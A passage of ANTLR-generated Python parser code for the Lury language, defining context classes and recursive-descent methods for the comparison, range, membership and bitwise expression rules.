if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << LuryParser.T__1) | (1 << LuryParser.T__2) | (1 << LuryParser.T__3) | (1 << LuryParser.T__4) | (1 << LuryParser.T__5) | (1 << LuryParser.T__6) | (1 << LuryParser.T__7) | (1 << LuryParser.T__8) | (1 << LuryParser.T__9) | (1 << LuryParser.T__10) | (1 << LuryParser.T__11) | (1 << LuryParser.T__12) | (1 << LuryParser.T__13) | (1 << LuryParser.T__14))) != 0)):
localctx.op = self._errHandler.recoverInline(self)
else:
self._errHandler.reportMatch(self)
self.consume()
self.state = 88
self.assignment_expression()
pass
elif la_ == 2:
localctx = LuryParser.CommaExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 90
self.comma_expression(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Comma_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_comma_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CommaContext(Comma_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comma_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comma_expression(self):
return self.getTypedRuleContext(LuryParser.Comma_expressionContext,0)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterComma" ):
listener.enterComma(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitComma" ):
listener.exitComma(self)
class BoolNotExpContext(Comma_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comma_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBoolNotExp" ):
listener.enterBoolNotExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBoolNotExp" ):
listener.exitBoolNotExp(self)
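# comma_expression is left-recursive in the grammar; ANTLR rewrites it into a
# loop that uses enterRecursionRule/precpred precedence predicates and
# pushNewRecursionContext to rebuild the left-recursive parse tree.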
def comma_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Comma_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 14
self.enterRecursionRule(localctx, 14, self.RULE_comma_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.BoolNotExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 94
self.bool_not_expression()
self._ctx.stop = self._input.LT(-1)
self.state = 101
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.CommaContext(self, LuryParser.Comma_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comma_expression)
self.state = 96
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 97
self.match(LuryParser.T__15)
self.state = 98
self.bool_not_expression()
self.state = 103
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Bool_not_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_bool_not_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class CompExpContext(Bool_not_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Bool_not_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCompExp" ):
listener.enterCompExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCompExp" ):
listener.exitCompExp(self)
class BoolNotContext(Bool_not_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Bool_not_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def bool_not_expression(self):
return self.getTypedRuleContext(LuryParser.Bool_not_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBoolNot" ):
listener.enterBoolNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBoolNot" ):
listener.exitBoolNot(self)
def bool_not_expression(self):
localctx = LuryParser.Bool_not_expressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_bool_not_expression)
try:
self.state = 107
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [LuryParser.T__16]:
localctx = LuryParser.BoolNotContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 104
self.match(LuryParser.T__16)
self.state = 105
self.bool_not_expression()
pass
elif token in [LuryParser.T__32, LuryParser.T__33, LuryParser.T__34, LuryParser.T__40, LuryParser.T__41, LuryParser.T__42, LuryParser.T__44, LuryParser.T__45, LuryParser.T__46, LuryParser.T__47, LuryParser.T__49, LuryParser.NAME, LuryParser.STRING_LITERAL, LuryParser.DECIMAL_INTEGER, LuryParser.OCT_INTEGER, LuryParser.HEX_INTEGER, LuryParser.BIN_INTEGER, LuryParser.FLOAT_NUMBER]:
localctx = LuryParser.CompExpContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 106
self.comparison_expression(0)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Comparison_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_comparison_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NotContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNot" ):
listener.enterNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNot" ):
listener.exitNot(self)
class EtqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterEtq" ):
listener.enterEtq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitEtq" ):
listener.exitEtq(self)
class LtContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLt" ):
listener.enterLt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLt" ):
listener.exitLt(self)
class LtqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLtq" ):
listener.enterLtq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLtq" ):
listener.exitLtq(self)
class RangeExpContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeExp" ):
listener.enterRangeExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeExp" ):
listener.exitRangeExp(self)
class EqContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterEq" ):
listener.enterEq(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitEq" ):
listener.exitEq(self)
class GtContext(Comparison_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Comparison_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def comparison_expression(self):
return self.getTypedRuleContext(LuryParser.Comparison_expressionContext,0)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGt" ):
listener.enterGt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGt" ):
listener.exitGt(self)
def comparison_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Comparison_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 18
self.enterRecursionRule(localctx, 18, self.RULE_comparison_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.RangeExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 110
self.range_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 132
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,8,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 130
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,7,self._ctx)
if la_ == 1:
localctx = LuryParser.GtContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 112
if not self.precpred(self._ctx, 7):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 7)")
self.state = 113
self.match(LuryParser.T__17)
self.state = 114
self.range_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.LtContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 115
if not self.precpred(self._ctx, 6):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 6)")
self.state = 116
self.match(LuryParser.T__18)
self.state = 117
self.range_expression(0)
pass
elif la_ == 3:
localctx = LuryParser.EqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 118
if not self.precpred(self._ctx, 5):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
self.state = 119
self.match(LuryParser.T__19)
self.state = 120
self.range_expression(0)
pass
elif la_ == 4:
localctx = LuryParser.LtqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 121
if not self.precpred(self._ctx, 4):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
self.state = 122
self.match(LuryParser.T__20)
self.state = 123
self.range_expression(0)
pass
elif la_ == 5:
localctx = LuryParser.EtqContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 124
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 125
self.match(LuryParser.T__21)
self.state = 126
self.range_expression(0)
pass
elif la_ == 6:
localctx = LuryParser.NotContext(self, LuryParser.Comparison_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_comparison_expression)
self.state = 127
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 128
self.match(LuryParser.T__22)
self.state = 129
self.range_expression(0)
pass
self.state = 134
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,8,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Range_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_range_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class RangeOpenContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeOpen" ):
listener.enterRangeOpen(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeOpen" ):
listener.exitRangeOpen(self)
class RangeCloseContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def range_expression(self):
return self.getTypedRuleContext(LuryParser.Range_expressionContext,0)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRangeClose" ):
listener.enterRangeClose(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRangeClose" ):
listener.exitRangeClose(self)
class InExpContext(Range_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Range_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInExp" ):
listener.enterInExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInExp" ):
listener.exitInExp(self)
def range_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Range_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 20
self.enterRecursionRule(localctx, 20, self.RULE_range_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.InExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 136
self.in_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 146
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,10,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 144
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,9,self._ctx)
if la_ == 1:
localctx = LuryParser.RangeOpenContext(self, LuryParser.Range_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_range_expression)
self.state = 138
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 139
self.match(LuryParser.T__23)
self.state = 140
self.in_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.RangeCloseContext(self, LuryParser.Range_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_range_expression)
self.state = 141
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 142
self.match(LuryParser.T__24)
self.state = 143
self.in_expression(0)
pass
self.state = 148
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,10,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class In_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_in_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class OrExpContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOrExp" ):
listener.enterOrExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOrExp" ):
listener.exitOrExp(self)
class InContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIn" ):
listener.enterIn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIn" ):
listener.exitIn(self)
class NotInContext(In_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.In_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def in_expression(self):
return self.getTypedRuleContext(LuryParser.In_expressionContext,0)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotIn" ):
listener.enterNotIn(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotIn" ):
listener.exitNotIn(self)
def in_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.In_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 22
self.enterRecursionRule(localctx, 22, self.RULE_in_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.OrExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 150
self.or_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 160
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,12,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
self.state = 158
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,11,self._ctx)
if la_ == 1:
localctx = LuryParser.InContext(self, LuryParser.In_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_in_expression)
self.state = 152
if not self.precpred(self._ctx, 3):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
self.state = 153
self.match(LuryParser.T__25)
self.state = 154
self.or_expression(0)
pass
elif la_ == 2:
localctx = LuryParser.NotInContext(self, LuryParser.In_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_in_expression)
self.state = 155
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 156
self.match(LuryParser.T__26)
self.state = 157
self.or_expression(0)
pass
self.state = 162
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,12,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Or_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_or_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class OrContext(Or_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Or_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def or_expression(self):
return self.getTypedRuleContext(LuryParser.Or_expressionContext,0)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOr" ):
listener.enterOr(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOr" ):
listener.exitOr(self)
class XorExpContext(Or_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Or_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterXorExp" ):
listener.enterXorExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitXorExp" ):
listener.exitXorExp(self)
def or_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Or_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 24
self.enterRecursionRule(localctx, 24, self.RULE_or_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.XorExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 164
self.xor_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 171
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,13,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.OrContext(self, LuryParser.Or_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_or_expression)
self.state = 166
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 167
self.match(LuryParser.T__27)
self.state = 168
self.xor_expression(0)
self.state = 173
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,13,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Xor_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_xor_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AndExpContext(Xor_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Xor_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAndExp" ):
listener.enterAndExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAndExp" ):
listener.exitAndExp(self)
class XorContext(Xor_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Xor_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def xor_expression(self):
return self.getTypedRuleContext(LuryParser.Xor_expressionContext,0)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterXor" ):
listener.enterXor(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitXor" ):
listener.exitXor(self)
def xor_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.Xor_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 26
self.enterRecursionRule(localctx, 26, self.RULE_xor_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.AndExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 175
self.and_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 182
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,14,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.XorContext(self, LuryParser.Xor_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_xor_expression)
self.state = 177
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 178
self.match(LuryParser.T__28)
self.state = 179
self.and_expression(0)
self.state = 184
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,14,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class And_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_and_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class ShiftExpContext(And_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.And_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterShiftExp" ):
listener.enterShiftExp(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitShiftExp" ):
listener.exitShiftExp(self)
class AndContext(And_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.And_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def and_expression(self):
return self.getTypedRuleContext(LuryParser.And_expressionContext,0)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnd" ):
listener.enterAnd(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnd" ):
listener.exitAnd(self)
def and_expression(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = LuryParser.And_expressionContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 28
self.enterRecursionRule(localctx, 28, self.RULE_and_expression, _p)
try:
self.enterOuterAlt(localctx, 1)
localctx = LuryParser.ShiftExpContext(self, localctx)
self._ctx = localctx
_prevctx = localctx
self.state = 186
self.shift_expression(0)
self._ctx.stop = self._input.LT(-1)
self.state = 193
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = LuryParser.AndContext(self, LuryParser.And_expressionContext(self, _parentctx, _parentState))
self.pushNewRecursionContext(localctx, _startState, self.RULE_and_expression)
self.state = 188
if not self.precpred(self._ctx, 2):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
self.state = 189
self.match(LuryParser.T__29)
self.state = 190
self.shift_expression(0)
self.state = 195
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Shift_expressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return LuryParser.RULE_shift_expression
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class LShiftContext(Shift_expressionContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a LuryParser.Shift_expressionContext
super().__init__(parser)
self.copyFrom(ctx)
def shift_expression(self):
return self.getTypedRuleContext(LuryParser.Shift_expressionContext,0)
def addition_expression(self):
return self.getTypedRuleContext(LuryParser.Addition_expressionContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLShift" ):
listener.enterLShift(self)
